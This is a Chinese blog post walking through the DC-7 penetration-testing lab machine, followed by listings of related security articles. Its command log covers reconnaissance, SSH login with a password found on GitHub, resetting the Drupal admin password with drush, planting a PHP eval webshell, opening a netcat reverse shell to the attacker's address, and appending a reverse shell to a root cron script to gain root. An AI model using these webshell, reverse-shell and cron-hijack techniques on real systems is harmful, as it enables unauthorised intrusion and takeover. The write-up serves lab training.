DC-7 writeup

最新推荐文章于 2024-09-26 22:16:03 发布
最新推荐文章于 2024-09-26 22:16:03 发布
阅读量130 收藏 2
点赞数 7
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141329459
版权

DC-7渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.155)

**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.155
dirsearch -u 192.168.229.155 -e * -x 404,403
whatweb 192.168.229.155
//发现是cms是drupal 8,提示我们不能像常规的解法,暴力破解也不行,这里提示我们要用社工,分析页面发现有个@DC7user,去网上搜发现github上有个这个作者,点进去看发现是源码,查找发现有个账号密码,dc7user  MdR3xOgB7#dW

**二.提权**
ssh dc7user@192.168.229.155
ls    
cat mbox    //发现有个mbox文件,打开看看发现是root以定时任务cron发送的,进入脚本文件看看
cd /opt/scripts
ls  -l    //发现www-data有写入和执行权限但dcuser没有,则我们要尝试找到www-data的权限
cat backups.sh    //发现可以用drush这个命令,则可以利用它来修改用户密码,但这个命令需要先切换到drupal的目录
cd /var/www/html
drush user-information admin    //这里猜有admin用户,查看一下信息,还真有
drush upwd admin --password="123456"    //修改admin的密码,登录进去看看,发现content板块可以写入html文件,但不能写入php文件,收集信息发现可以新增php模块,把这个url写到那个添加链接中https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
<?php @eval($_REQUEST['shell'])?>    //写入后门代码,用哥斯拉连接
nc -e /bin/bash 192.168.229.132 8888     //连接虚拟shell
cd /opt/scripts
echo "nc -e /bin/bash 192.168.229.132 7777" >> backups.sh    //利用root的定时任务反向连接 root权限的shell,等待执行即可连接root权限
find / -name * flag.*
cat theflag.txt

Jay-wings
关注
GKCTF2021-官方WriteUp.pdf
07-06
7. babycat非预期漏洞利用: 提到一个名为babycat的漏洞,攻击者利用上传Servlet中doPost方法没有权限校验的漏洞,以及在check函数后转发没有返回导致的非预期行为。 8. 修复方案: 文档最后提到了一个预期的修复...
D3CTF2022-官方WriteUp1
08-03
7. MySQL UDF 提权 Exploit 攻击者可以使用 MySQL UDF 提权来攻击 MySQL 数据库。首先,攻击者需要创建一个恶意的 UDF,然后使用该 UDF 来执行恶意代码,以便获得提权。 8. Java 反序列化攻击 攻击者可以使用 ...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
Prediction-Assignment-Writeup
03-18
9. **代码组织**: "Prediction-Assignment-Writeup-main"可能包含了一个结构化的代码目录,包括数据读取脚本、预处理函数、模型训练代码、结果评估和可视化代码等,体现了良好的编程实践。 10. **报告撰写**: 数据...
Systems-Administration-Writeup
03-17
在“Systems-Administration-Writeup-main”这个文件中,可能会详细讲解这些概念和技巧,包括如何监控系统、管理日志、设置别名以及有效利用VIM进行文本编辑。通过学习这些内容,你可以增强自己的系统管理能力,更好...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全详解
weidl001的博客
09-21 1398
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-24 625
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全证书考取相关知识
aa98865646的博客
09-21 628
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 550
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1077
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
19、网络安全合规复盘
最新发布
weixin_43263566的博客
09-26 96
网络安全的岗位分析
2401_84945993的博客
09-26 407
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,CISAW-PIS个人信息安全方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。作为渗透测试工程师,他们如同网络世界中的“侦探”,通过模拟黑客攻击的方式,深入挖掘系统中的潜在漏洞。他们需要具备深厚的编程能力和安全知识,以确保开发出的产品具有高度的安全性和可靠性。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 371
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
网络安全】Drupal之缓存中毒+储存型XSS
等风来
09-23 344
缓存系统通常会基于唯一键(如URL和查询参数的组合)来区分不同的请求和响应。即使你请求的是相同的资源,如果URL中的参数不同,服务器可能会为不同的参数创建不同的缓存条目。例如,GET /page?param=123和GET /page?param=456会被视为不同的请求。
网络安全入门
丁爸的博客
09-23 1160
网络安全是一个复杂而重要的领域,它涉及保护网络系统的硬件、软件及其数据免受未经授权的访问、使用、泄露、中断、修改或破坏。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,并保障网络数据的完整性、保密性、可用性的能力。
web开发中的网络安全
架构师吕师傅
09-22 789
超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付信息。为了解决HTTP协议的这一缺陷,需要使用另一种协议:安全套接字层超文本传输协议HTTPS,为了数据传输的安全,HTTPS在HTTP的基础上加入了SSL协议,SSL依靠证书来验证服务器的身份,并为浏览器和服务器之间的通信加密。
15、网络安全合规由来与要素
weixin_43263566的博客
09-26 417
指服从、顺从和遵从的行为,强调使公司的经营活动与法律、监管及内部规则保持一致。合规涉及公司适应法律法规及社会规范等规则的经营行为。这一规定反映了合规在金融行业中的重要性,旨在确保银行在运营中遵循法律法规,维护金融系统的稳定与透明。1998年9月,巴塞尔银行监管委员会在《银行业组织内部控制体系框架》中,将“合法性和合规性”列为银行内部控制框架的重要要素之一。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值